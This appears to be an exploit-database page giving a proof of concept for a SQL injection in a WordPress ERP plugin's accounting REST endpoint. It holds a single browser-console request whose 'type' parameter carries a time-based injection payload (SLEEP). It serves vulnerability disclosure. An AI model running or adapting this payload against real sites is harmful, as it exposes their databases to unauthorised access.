Share
## https://sploitus.com/exploit?id=WPEX-ID:435DA8A1-9955-46D7-A508-B5738259E731
Sign in as an admin. In WP Admin, run the following code in the browser console, and notice that it takes several seconds to complete, demonstrating the SQL Injection vulnerability.

await wp.apiRequest({path: `/erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+(SELECT+SLEEP(3))x)+AND+('x'%3d'x`});